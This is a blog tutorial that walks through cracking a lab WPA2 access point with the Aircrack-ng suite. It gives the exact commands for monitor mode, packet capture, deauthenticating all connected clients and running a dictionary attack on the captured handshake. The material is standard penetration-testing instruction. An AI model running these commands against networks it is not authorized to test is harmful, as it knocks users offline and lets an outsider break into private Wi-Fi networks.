In our series of Wireless Penetration Testing, this time we are focusing on a tool that has been around for ages. This is the tool that has given birth to many of the Wireless Attacks and tools. Aircrack-ng is not a tool but it is a suite of tools that all perform different types of attacks or activities related to Wireless Access Points. In this demonstration, we will be focusing on a few of the tools from the Aircrack-ng arsenal.
Table of Content
·
Introduction
·
Enabling Monitor Mode
·
Sniffing Wireless Packets
·
Deauthencating Users
·
Capturing Handshake
·
Cracking Password
·
Conclusion
Introduction
Aircrack-ng is a package of Wi-Fi network
security assessment tools. It has a detector, a packet sniffer, WPA/WPA2-PSK,
and a WEP cracker and analyzer for 802.11 Wireless LANs. With the help of
Aircrack-ng, a penetration tester can focus on Monitoring, Attacking, Testing,
and Cracking aspects of the Wi-Fi Security. Monitoring includes Packer
Capturing and exporting the data to text files for processing by any third-party
tool. Attacking includes replay attacks, deauthentication, evil-twin attacks,
and packet injection attacks. Testing includes the testing of the Wi-Fi cards
and driver capabilities based on the capture and injections. Finally Cracking
includes the ability to crack the WEP and WPA PSK keys.
Aircrack-ng is supported on Linux, FreeBSD,
macOS, OpenBSD, Android, and Windows.
There are a bunch of tools inside the
Aircrack-ng Suite. In this demonstration, we will be focusing on the following:
airmon-ng: It
is used to enabling Monitor Mode on Wi-Fi Card
airodump-ng:
It is used for sniffing packets. It places the air traffic into a pcap file and
shows information about the network
aireplay-ng:
It is used for Packet Injection Attacks
aircrack-ng:
It is used for cracking the WEP keys using the Fluhrer, Mantin, and Shamir
attack (FMS) attack, PTW attack, and dictionary attacks, and WPA/WPA2-PSK using
dictionary attacks.
Note: To perform attacks using Aircrack-ng,
you need an external Wi-Fi card with monitoring mode.
Enabling Monitor Mode
In general words, Monitor Mode is a mode
that is supported by certain Wi-Fi devices. When enabled, the Wi-Fi card will
stop sending any data and will be completely dedicated to monitoring the wireless
traffic. It is not the only mode that is supported on Wi-Fi devices, there are
a total of 6 modes. However, in this demonstration, we will be focusing on
Monitor mode only.
As discussed in the Introduction, airmon-ng
is used for enabling the Monitor mode on Wi-Fi cards. After connecting the
external card with our machine, we will use airmon-ng to start monitor mode by
providing the interface. In our case the interface in question is wlan0. If you
seem to have issues with enabling the monitor mode, kill the processes that are
mentioned with their respective PIDs to ensure that no processes conflict. If not,
this will put our Wi-Fi card in Monitor mode.
airmon-ng start wlan0
After using the airmon-ng, we can check the
enabling of monitor mode by using the iwconfig command. It is a Linux command
that can be used to configure a wireless network interface. It is similar to
ifconfig which is used for general interface configurations. After running
iwconfig we can see that the interface that we used with airmon-ng has now
changed from wlan0 to wlan0mon. Here mon indicates the monitor mode.
iwconfig
Sniffing Wireless Packets
After placing the Wi-Fi card in the Monitor
mode, we can then move to sniff network packets. As discussed in the
Introduction, airodump-ng can be used for this activity. To start sniffing, we
need to provide the airodump-ng with the ESSID of the access point with other
details. To get the information required run airodump-ng with the interface
only as demonstrated below.
airodump-ng wlan0mon
As soon as we start the airodump-ng, we
will see the list of Access Points with details such as their BSSID (MAC
Address), Strength (PWR), Encryption (WPA/WPA2), Authentication Method, and
ESSID (Name of Wireless Access Point) as demonstrated below. We will be
targeting the wireless Access Point by the name of “raaj”. We can see that the
access point is broadcasting on channel 3 and has WPA2-PSK.
Now that we have the ESSID of the access
point that we want to target, we can initiate the sniffing on that particular
device. We will need to provide the
interface that we have monitor mode on and the details such as the channel of
the device, BSSID as demonstrated below. This will begin the network capture.
airodump-ng wlan0mon -c 3 --bssid 18:X:X:X:X:X
-w pwd
Since we want to crack the password for the
targeted access point, we need the handshake that can be attacked. We will be
using the airodump-ng for capturing that handshake. But since all the devices
are already connected to the access point hence, there won’t be any
authentication performed or we can say that we won’t be able to capture the
handshake. So, we will be sending a deauthentication signal to all the devices
so that they will be disconnected from the access point. Then they will try to
reconnect and at that moment we will capture the handshake. We will be using
the aireplay-ng for sending the deauthentication signal. We need to provide the
BSSID of the access point to deauthenticate all devices as demonstrated below.
Make sure to use a new terminal while running the aireplay and let the
airodump-ng running. So that it can capture the handshake.
aireplay-ng --deauth 0 -a 18:X:X:X:X:X
wlan0mon
We go back to the terminal where we started
the airodump-ng and we can see all the devices that attempted to reconnect to
our targeted access point and on the top right-hand side, we can see that
airodump-ng was able to capture the WPA handshake between the access point and
one of its users.
While running the airodump-ng we mentioned
the pwd as the file in which the handshake should be saved. While checking we
see that it has been captured into the file named pwd-01.cap. We can now
perform a Bruteforce to crack the password using the aircrack-ng. We need to provide a dictionary for the attack
that contains the probable passwords.
aircrack-ng pwd-01.cap -w dict.txt
The time that aircrack-ng takes depends on
your system configurations and the number of entries in the dictionary file
that you provided. The dictionary that we provided had 7 keys. Hence, we were
able to crack it in a matter of seconds. We can see the Master and Transient
Key that would be used while forming the PSK-PTK combination. The password for
the access point was cracked to be raj12345.
Conclusion
The collection of tools in the Aircrack-ng
suite is useful in testing the Wireless Access Point Security. With the help of
just 4 tools, we were able to crack the password required to connect the
targeted Access Point. Aircrack-ng is one of the oldest tools that is used in
the domain but we were still able to crack the authentication of a device
today.
0 comments:
Post a Comment